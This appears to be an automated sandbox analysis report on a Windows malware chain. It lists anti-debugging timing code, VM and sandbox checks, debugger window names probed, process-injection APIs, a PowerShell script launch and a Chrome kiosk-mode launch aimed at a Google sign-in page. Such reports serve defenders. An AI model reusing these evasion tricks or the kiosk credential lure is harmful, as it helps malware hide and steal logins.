Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10A6B98 second address: 10A6BAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F0D8517B906h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jno 00007F0D8517B906h 0x00000016 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10A6BB2 second address: 10A6BC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F0D8517B908h 0x0000000e push edx 0x0000000f pop edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10C0734 second address: 10C075B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push esi 0x00000007 push edx 0x00000008 pop edx 0x00000009 jp 00007F0D84D62016h 0x0000000f pop esi 0x00000010 pushad 0x00000011 jng 00007F0D84D62016h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 pushad 0x00000023 pushad 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10C08AC second address: 10C08D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0D8517B90Eh 0x0000000a jmp 00007F0D8517B914h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10CD635 second address: 10CD655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0D84D62027h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10D15E9 second address: 10D15F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jns 00007F0D8517B906h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10D1CE2 second address: 10D1CEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F0D84D62016h 0x0000000d rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10D1CEF second address: 10D1CF9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0D8517B906h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10D1E8A second address: 10D1EAC instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0D84D62016h 0x00000008 jmp 00007F0D84D62023h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push edi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10D37A7 second address: 10D37BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D8517B90Dh 0x00000007 pushad 0x00000008 jbe 00007F0D8517B906h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10D63A5 second address: 10D63E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F0D84D62018h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 jmp 00007F0D84D62020h 0x00000028 push 00000004h 0x0000002a push 0A3AD682h 0x0000002f push esi 0x00000030 push eax 0x00000031 push edx 0x00000032 push edx 0x00000033 pop edx 0x00000034 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 4BF026D second address: 4BF0272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 4BF0272 second address: 4BF0286 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D8517B910h 0x00000009 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 4BF0286 second address: 4BF02F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov ebx, eax 0x0000000c movzx eax, di 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 pushad 0x00000012 call 00007F0D84D62021h 0x00000017 movzx esi, dx 0x0000001a pop edi 0x0000001b pushad 0x0000001c jmp 00007F0D84D62028h 0x00000021 jmp 00007F0D84D62022h 0x00000026 popad 0x00000027 popad 0x00000028 mov ebp, esp 0x0000002a jmp 00007F0D84D62020h 0x0000002f pop ebp 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 4BF02F3 second address: 4BF02F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 4BF02F7 second address: 4BF0314 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D84D62029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 4BF034C second address: 4BF03D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0D8517B911h 0x00000009 jmp 00007F0D8517B90Bh 0x0000000e popfd 0x0000000f mov eax, 12786D7Fh 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 pushad 0x00000019 push ebx 0x0000001a call 00007F0D8517B90Eh 0x0000001f pop esi 0x00000020 pop edi 0x00000021 jmp 00007F0D8517B910h 0x00000026 popad 0x00000027 xchg eax, ebp 0x00000028 pushad 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F0D8517B90Ch 0x00000030 sbb ecx, 6A8B1FC8h 0x00000036 jmp 00007F0D8517B90Bh 0x0000003b popfd 0x0000003c mov bx, si 0x0000003f popad 0x00000040 popad 0x00000041 mov ebp, esp 0x00000043 jmp 00007F0D8517B90Eh 0x00000048 pop ebp 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c push ecx 0x0000004d pop edx 0x0000004e popad 0x0000004f rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\1000115002\6b11689b40.exe Special instruction interceptor: First address: FE46E3 instructions caused by: Self-modifying code
Source: C:\Users\user\1000115002\6b11689b40.exe Special instruction interceptor: First address: E41B22 instructions caused by: Self-modifying code
Source: C:\Users\user\1000115002\6b11689b40.exe Special instruction interceptor: First address: 10784B0 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\1000115002\6b11689b40.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\1000115002\6b11689b40.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\1000115002\6b11689b40.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 9603 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1952 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 755 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\4qIl08vrFY.exe API coverage: 3.2 %
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe API coverage: 1.3 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2676 Thread sleep count: 9603 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2676 Thread sleep time: -288090000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5512 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2676 Thread sleep count: 207 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2676 Thread sleep time: -6210000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 616 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4460 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1272 Thread sleep time: -30000s >= -30000s Jump to behavior
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\4qIl08vrFY.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: 0_2_006DDC0D FindFirstFileExW, 0_2_006DDC0D
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_0017DC0D FindFirstFileExW, 1_2_0017DC0D
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Code function: 4_2_0005E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 4_2_0005E430
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Code function: 4_2_000638B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 4_2_000638B0
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Code function: 4_2_00064910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 4_2_00064910
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Code function: 4_2_0005ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 4_2_0005ED20
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Code function: 4_2_00064570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 4_2_00064570
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Code function: 4_2_0005DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 4_2_0005DE10
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Code function: 4_2_0005BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 4_2_0005BE70
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Code function: 4_2_0005DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 4_2_0005DA80
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Code function: 4_2_00063EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 4_2_00063EA0
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Code function: 4_2_0005F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 4_2_0005F6B0
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Code function: 4_2_000516D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 4_2_000516D0
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: 0_2_006A7D30 GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo, 0_2_006A7D30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: 6b11689b40.exe Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: skotes.exe, 00000003.00000002.4500898178.0000000001097000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWx
Source: 6b11689b40.exe, 00000005.00000002.2214014711.0000000001AB3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW8
Source: chrome.exe, 0000000A.00000002.4507734205.0000020C0520F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000008.00000002.2249102526.0000000007A1C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\a?
Source: chrome.exe, 0000000A.00000003.2927746811.0000020C08DA2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: NXTVMWare
Source: skotes.exe, 00000003.00000002.4500898178.0000000001097000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.4500898178.0000000001038000.00000004.00000020.00020000.00000000.sdmp, num.exe, 00000004.00000002.2121787066.0000000000C1D000.00000004.00000020.00020000.00000000.sdmp, num.exe, 00000004.00000002.2121787066.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp, 6b11689b40.exe, 00000005.00000002.2214014711.0000000001AE3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 6b11689b40.exe, 00000005.00000002.2214014711.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: 6b11689b40.exe, 00000005.00000002.2214014711.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware7
Source: 4qIl08vrFY.exe, 00000000.00000003.2034922216.000000000087F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000008.00000002.2249102526.0000000007A1C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}5
Source: 6b11689b40.exe, 00000005.00000002.2213276229.0000000000FC6000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: chrome.exe, 0000000A.00000002.4506852429.0000020C05187000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll==YYP
Source: 6b11689b40.exe, 00000005.00000002.2214014711.0000000001AE3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWa
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\1000115002\6b11689b40.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\1000115002\6b11689b40.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\1000115002\6b11689b40.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\1000115002\6b11689b40.exe Thread information set: HideFromDebugger
Source: C:\Users\user\1000115002\6b11689b40.exe Thread information set: HideFromDebugger
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\1000115002\6b11689b40.exe Open window title or class name: regmonclass
Source: C:\Users\user\1000115002\6b11689b40.exe Open window title or class name: gbdyllo
Source: C:\Users\user\1000115002\6b11689b40.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\1000115002\6b11689b40.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\1000115002\6b11689b40.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\1000115002\6b11689b40.exe Open window title or class name: ollydbg
Source: C:\Users\user\1000115002\6b11689b40.exe Open window title or class name: filemonclass
Source: C:\Users\user\1000115002\6b11689b40.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\1000115002\6b11689b40.exe File opened: NTICE
Source: C:\Users\user\1000115002\6b11689b40.exe File opened: SICE
Source: C:\Users\user\1000115002\6b11689b40.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\1000115002\6b11689b40.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\1000115002\6b11689b40.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\1000115002\6b11689b40.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\1000115002\6b11689b40.exe Process queried: DebugPort
Source: C:\Users\user\1000115002\6b11689b40.exe Process queried: DebugPort
Source: C:\Users\user\1000115002\6b11689b40.exe Process queried: DebugPort
Source: C:\Users\user\1000115002\6b11689b40.exe Process queried: DebugPort
Source: C:\Users\user\1000115002\6b11689b40.exe Process queried: DebugPort
Source: C:\Users\user\1000115002\6b11689b40.exe Process queried: DebugPort
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: 0_2_006D6AAE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_006D6AAE
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Code function: 4_2_000545C0 VirtualProtect ?,00000004,00000100,00000000 4_2_000545C0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: 0_2_006CBF99 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_006CBF99
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: 0_2_006DA302 mov eax, dword ptr fs:[00000030h] 0_2_006DA302
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: 0_2_006D652B mov eax, dword ptr fs:[00000030h] 0_2_006D652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_0017A302 mov eax, dword ptr fs:[00000030h] 1_2_0017A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_0017652B mov eax, dword ptr fs:[00000030h] 1_2_0017652B
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Code function: 4_2_00069750 mov eax, dword ptr fs:[00000030h] 4_2_00069750
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Code function: 4_2_00067850 GetProcessHeap,HeapAlloc,GetUserNameA, 4_2_00067850
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: 0_2_006BD1E7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_006BD1E7
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: 0_2_006D6AAE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_006D6AAE
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: 0_2_006BDBA5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_006BDBA5
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: 0_2_006BDD0A SetUnhandledExceptionFilter, 0_2_006BDD0A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_0015D1E7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_0015D1E7
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00176AAE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00176AAE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_0015DBA5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0015DBA5
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_0015DD0A SetUnhandledExceptionFilter, 1_2_0015DD0A
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Code function: 4_2_0006AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_0006AD48
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Code function: 4_2_0006CEEA SetUnhandledExceptionFilter, 4_2_0006CEEA
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Code function: 4_2_0006B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_0006B33A
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: skotes.exe PID: 7124, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 1876, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 6b11689b40.exe PID: 1532, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\num[1].exe, type: DROPPED
Contains functionality to inject code into remote processes
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: 0_2_006A70A0 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree, 0_2_006A70A0
Searches for specific processes (likely to inject)
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Code function: 4_2_00069600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 4_2_00069600
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000113001\num.exe "C:\Users\user\AppData\Local\Temp\1000113001\num.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\1000115002\6b11689b40.exe "C:\Users\user\1000115002\6b11689b40.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1000140041\ko.ps1" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --kiosk --user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data Jump to behavior
Source: 6b11689b40.exe, 6b11689b40.exe, 00000005.00000002.2213276229.0000000000FC6000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: ^@Program Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: 0_2_006BDD91 cpuid 0_2_006BDD91
Contains functionality to query locales information (e.g. system language)
